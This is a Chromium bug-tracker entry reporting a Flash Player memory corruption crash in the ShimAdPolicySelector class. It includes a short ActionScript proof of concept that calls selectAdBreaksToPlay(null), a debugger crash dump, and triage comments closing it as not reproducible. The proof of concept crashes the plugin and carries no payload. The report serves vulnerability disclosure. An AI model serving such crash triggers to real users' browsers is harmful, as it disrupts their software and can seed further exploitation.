New issue
Advanced search Search tips

Issue 619043 link

Starred by 1 user
Status: WontFix
Owner: ----
Closed: Jun 2016
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security



Sign in to add a comment

Security: Adobe Flash Player ShimAdPolicySelector Class Memory Corruption

Reported by laona...@gmail.com, Jun 10 2016 
VULNERABILITY DETAILS
A memory corruption vulnerability exists when selectAdBreaksToPlay function call does not properly sanitized the input before processing, leads to crash of Adobe Flash Player.

POC
package
{
   import flash.display.Sprite;
   import com.adobe.tvsdk.mediacore.timeline.advertising.policy.ShimAdPolicySelector;

   public class Main extends Sprite
   {

      public function Main()
      {
         super();
         var _loc1_:ShimAdPolicySelector = new ShimAdPolicySelector(0,null);
         _loc1_.selectAdBreaksToPlay(null);
      }
   }
}

Crash under windows + IE:
(8a8.1fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
0:007> r
eax=5342e253 ebx=000007d4 ecx=0681e660 edx=00000000 esi=069c0748 edi=00000000
eip=64f3b1ca esp=0240c20c ebp=0240c298 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210206
Flash32_21_0_0_242!DllUnregisterServer+0x13a8f7:
64f3b1ca 8b7f10          mov     edi,dword ptr [edi+10h] ds:0023:00000010=????????
0:007> u
Flash32_21_0_0_242!DllUnregisterServer+0x13a8f7:
64f3b1ca 8b7f10          mov     edi,dword ptr [edi+10h]
64f3b1cd 8b01            mov     eax,dword ptr [ecx]
64f3b1cf 8d5584          lea     edx,[ebp-7Ch]
64f3b1d2 52              push    edx
64f3b1d3 57              push    edi
64f3b1d4 ff5010          call    dword ptr [eax+10h]
64f3b1d7 83f807          cmp     eax,7
64f3b1da 7437            je      Flash32_21_0_0_242!DllUnregisterServer+0x13a940 (64f3b213)

Crash within Chrome is more or less the same.

VERSION
Chrome Version: 50.0.2661.102 (64-bit) + stable
Operating System: Mac, Adobe Flash Player - Version: 21.0.0.242

REPRODUCTION CASE
put the attached PoC in a http server and simply browse it should give you a crash.

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Crash State: [see link above: stack trace, registers, exception record]
Client ID (if relevant): [see link above]
selectAdBreaksToPlay.swf
645 bytes Download
Project Member

Comment 1 by ClusterFuzz, Jun 10 2016 

ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=6366338595684352
Project Member

Comment 2 by ClusterFuzz, Jun 10 2016 

ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5394710072131584

Comment 3 by nparker@chromium.org, Jun 10 2016

Status: WontFix (was: Unconfirmed)
This doesn't repro.  Maybe it was fixed since m50?

Comment 4 by laona...@gmail.com, Jun 11 2016 

Thanks for checking.
Do you mind share what's the Flash Player version in m50? where can I find it?

Thanks.
Project Member

Comment 5 by sheriffbot@chromium.org, Sep 17 2016

Labels: -Restrict-View-SecurityTeam
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 6 by sheriffbot@chromium.org, Oct 1 2016 

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 7 by sheriffbot@chromium.org, Oct 2 2016 

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 8 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic

Sign in to add a comment